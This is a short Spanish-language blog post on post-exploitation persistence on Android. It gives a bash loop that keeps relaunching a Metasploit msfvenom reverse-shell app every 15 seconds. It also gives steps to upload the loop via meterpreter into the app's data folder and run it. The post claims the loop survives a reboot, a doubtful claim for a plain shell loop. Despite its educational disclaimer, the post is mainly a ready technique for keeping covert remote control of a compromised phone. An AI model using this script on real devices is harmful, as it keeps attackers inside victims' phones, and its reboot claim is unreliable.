Android - Persistencia en sistemas móviles (reverse shell).
DISCLAIMER: El contenido de este artículo tiene como propósito compartir información para fines educativos. No me hago responsable de cualquier acto ilícito realizado con la información siguiente. No vulneres sistemas ajenos a los tuyos. El conocimiento es libre.
Cuando se realiza un Pentest, una de las cosas que nos atañen es el mantener la persistencia en los sistemas vulnerados y mucho más si estos son móviles.
Es por ello que hoy veremos un pequeño script ".sh" que nos permitirá mantener conexión con el dispositivo remoto, y que exista una persistencia (reverse shell).
Una vez vulnerada una terminal de Android, lo único que queda es
correr un archivo en BASH que mande llamar de manera recursiva a
la aplicación maliciosa. Se toma como ejemplo una shell creada con msfvenom
(de Metasploit).
El script:
----------------------------------------------------------------------------------------------------------------
while true:
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 15
done
----------------------------------------------------------------------------------------------------------------
Hay que movernos con la shell interna del sistema vulnerado hasta la ruta:
/data/data/com.metasploit.stage/files
Para luego proceder a subir la recursividad (comando upload desde meterpreter) y correrla con el comando:
sh recur.sh
La recursividad funciona aún con el reinicio del sistema.
By: Krh3rtz
__Exploiting vulnerabilities, creating new ways through__
Comentarios
Publicar un comentario